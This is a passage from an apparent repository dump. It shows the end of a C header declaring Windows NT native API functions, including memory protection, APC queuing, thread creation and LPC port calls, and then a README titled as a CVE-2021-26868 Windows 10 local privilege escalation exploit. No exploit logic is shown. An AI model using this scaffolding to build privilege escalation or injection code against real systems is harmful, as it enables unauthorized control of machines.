_Out_opt_ PSIZE_T NumberOfBytesWritten 6271 | ); 6272 | 6273 | NTSTATUS NTAPI NtProtectVirtualMemory( 6274 | _In_ HANDLE ProcessHandle, 6275 | _Inout_ PVOID *BaseAddress, 6276 | _Inout_ PSIZE_T RegionSize, 6277 | _In_ ULONG NewProtect, 6278 | _Out_ PULONG OldProtect 6279 | ); 6280 | 6281 | NTSTATUS NTAPI NtEnumerateKey( 6282 | _In_ HANDLE KeyHandle, 6283 | _In_ ULONG Index, 6284 | _In_ KEY_INFORMATION_CLASS KeyInformationClass, 6285 | _Out_opt_ PVOID KeyInformation, 6286 | _In_ ULONG Length, 6287 | _Out_ PULONG ResultLength 6288 | ); 6289 | 6290 | NTSTATUS NTAPI NtCreatePort( 6291 | _Out_ PHANDLE PortHandle, 6292 | _In_ POBJECT_ATTRIBUTES ObjectAttributes, 6293 | _In_ ULONG MaxConnectionInfoLength, 6294 | _In_ ULONG MaxMessageLength, 6295 | _In_ ULONG MaxPoolUsage 6296 | ); 6297 | 6298 | NTSTATUS NTAPI NtCompleteConnectPort( 6299 | _In_ HANDLE PortHandle 6300 | ); 6301 | 6302 | NTSTATUS NTAPI NtListenPort( 6303 | _In_ HANDLE PortHandle, 6304 | _Out_ PPORT_MESSAGE ConnectionRequest 6305 | ); 6306 | 6307 | NTSTATUS NTAPI NtReplyPort( 6308 | _In_ HANDLE PortHandle, 6309 | _In_ PPORT_MESSAGE ReplyMessage 6310 | ); 6311 | 6312 | NTSTATUS NTAPI NtReplyWaitReplyPort( 6313 | _In_ HANDLE PortHandle, 6314 | _Inout_ PPORT_MESSAGE ReplyMessage 6315 | ); 6316 | 6317 | NTSTATUS NTAPI NtRequestPort( 6318 | _In_ HANDLE PortHandle, 6319 | _In_ PPORT_MESSAGE RequestMessage 6320 | ); 6321 | 6322 | NTSTATUS NTAPI NtRequestWaitReplyPort( 6323 | _In_ HANDLE PortHandle, 6324 | _In_ PPORT_MESSAGE RequestMessage, 6325 | _Out_ PPORT_MESSAGE ReplyMessage 6326 | ); 6327 | 6328 | NTSTATUS NTAPI NtClosePort( 6329 | _In_ HANDLE PortHandle 6330 | ); 6331 | 6332 | NTSTATUS NTAPI NtReplyWaitReceivePort( 6333 | _In_ HANDLE PortHandle, 6334 | _Out_opt_ PVOID *PortContext, 6335 | _In_opt_ PPORT_MESSAGE ReplyMessage, 6336 | _Out_ PPORT_MESSAGE ReceiveMessage 6337 | ); 6338 | 6339 | NTSTATUS NTAPI NtWriteRequestData( 6340 | _In_ HANDLE PortHandle, 6341 | _In_ PPORT_MESSAGE Message, 6342 | _In_ ULONG DataEntryIndex, 6343 | _In_ PVOID Buffer, 6344 | _In_ ULONG BufferSize, 6345 | _Out_opt_ PULONG NumberOfBytesWritten 6346 | ); 6347 | 6348 | NTSTATUS NTAPI NtReadRequestData( 6349 | _In_ HANDLE PortHandle, 6350 | _In_ PPORT_MESSAGE Message, 6351 | _In_ ULONG DataEntryIndex, 6352 | _Out_ PVOID Buffer, 6353 | _In_ ULONG BufferSize, 6354 | _Out_opt_ PULONG NumberOfBytesRead 6355 | ); 6356 | 6357 | NTSTATUS NTAPI NtConnectPort( 6358 | _Out_ PHANDLE PortHandle, 6359 | _In_ PUNICODE_STRING PortName, 6360 | _In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos, 6361 | _Inout_opt_ PPORT_VIEW ClientView, 6362 | _Out_opt_ PREMOTE_PORT_VIEW ServerView, 6363 | _Out_opt_ PULONG MaxMessageLength, 6364 | _Inout_opt_ PVOID ConnectionInformation, 6365 | _Inout_opt_ PULONG ConnectionInformationLength 6366 | ); 6367 | 6368 | NTSTATUS NTAPI NtAcceptConnectPort( 6369 | _Out_ PHANDLE PortHandle, 6370 | _In_opt_ PVOID PortContext, 6371 | _In_ PPORT_MESSAGE ConnectionRequest, 6372 | _In_ BOOLEAN AcceptConnection, 6373 | _Inout_opt_ PPORT_VIEW ServerView, 6374 | _Out_opt_ PREMOTE_PORT_VIEW ClientView); 6375 | 6376 | typedef 6377 | VOID 6378 | (*PPS_APC_ROUTINE) ( 6379 | _In_opt_ PVOID ApcArgument1, 6380 | _In_opt_ PVOID ApcArgument2, 6381 | _In_opt_ PVOID ApcArgument3); 6382 | 6383 | NTSTATUS NTAPI NtQueueApcThread( 6384 | _In_ HANDLE ThreadHandle, 6385 | _In_ PPS_APC_ROUTINE ApcRoutine, 6386 | _In_opt_ PVOID ApcArgument1, 6387 | _In_opt_ PVOID ApcArgument2, 6388 | _In_opt_ PVOID ApcArgument3); 6389 | 6390 | NTSTATUS NTAPI NtWaitForSingleObject( 6391 | _In_ HANDLE Handle, 6392 | _In_ BOOLEAN Alertable, 6393 | _In_opt_ PLARGE_INTEGER Timeout); 6394 | 6395 | NTSTATUS NTAPI NtYieldExecution( 6396 | VOID); 6397 | 6398 | NTSTATUS NTAPI NtCreateMailslotFile( 6399 | _Out_ PHANDLE FileHandle, 6400 | _In_ ULONG DesiredAccess, 6401 | _In_ POBJECT_ATTRIBUTES ObjectAttributes, 6402 | _Out_ PIO_STATUS_BLOCK IoStatusBlock, 6403 | _In_ ULONG CreateOptions, 6404 | _In_ ULONG MailslotQuota, 6405 | _In_ ULONG MaximumMessageSize, 6406 | _In_ PLARGE_INTEGER ReadTimeout); 6407 | 6408 | NTSTATUS NTAPI NtSecureConnectPort( 6409 | _Out_ PHANDLE PortHandle, 6410 | _In_ PUNICODE_STRING PortName, 6411 | _In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos, 6412 | _Inout_opt_ PPORT_VIEW ClientView, 6413 | _In_opt_ PSID RequiredServerSid, 6414 | _Inout_opt_ PREMOTE_PORT_VIEW ServerView, 6415 | _Out_opt_ PULONG MaxMessageLength, 6416 | _Inout_opt_ PVOID ConnectionInformation, 6417 | _Inout_opt_ PULONG ConnectionInformationLength); 6418 | 6419 | NTSTATUS NTAPI NtEnumerateBootEntries( 6420 | _Out_ PVOID Buffer, 6421 | _Inout_ PULONG BufferLength); 6422 | 6423 | NTSTATUS NTAPI NtPrivilegeCheck( 6424 | _In_ HANDLE ClientToken, 6425 | _Inout_ PPRIVILEGE_SET RequiredPrivileges, 6426 | _Out_ PBOOLEAN Result 6427 | ); 6428 | 6429 | NTSTATUS NTAPI NtCreateProcessEx( 6430 | _Out_ PHANDLE ProcessHandle, 6431 | _In_ ACCESS_MASK DesiredAccess, 6432 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 6433 | _In_ HANDLE ParentProcess, 6434 | _In_ ULONG Flags, 6435 | _In_opt_ HANDLE SectionHandle, 6436 | _In_opt_ HANDLE DebugPort, 6437 | _In_opt_ HANDLE ExceptionPort, 6438 | _In_ BOOLEAN InJob); 6439 | 6440 | NTSTATUS NTAPI NtCreateThreadEx( 6441 | _Out_ PHANDLE hThread, 6442 | _In_ ACCESS_MASK DesiredAccess, 6443 | _In_ LPVOID ObjectAttributes, 6444 | _In_ HANDLE ProcessHandle, 6445 | _In_ LPTHREAD_START_ROUTINE lpStartAddress, 6446 | _In_ LPVOID lpParameter, 6447 | _In_ BOOL CreateSuspended, 6448 | _In_ DWORD StackZeroBits, 6449 | _In_ DWORD SizeOfStackCommit, 6450 | _In_ DWORD SizeOfStackReserve, 6451 | _Out_ LPVOID lpBytesBuffer); 6452 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2021-26868 Windows 10 LPE Exploit 2 | --------------------------------------------------------------------------------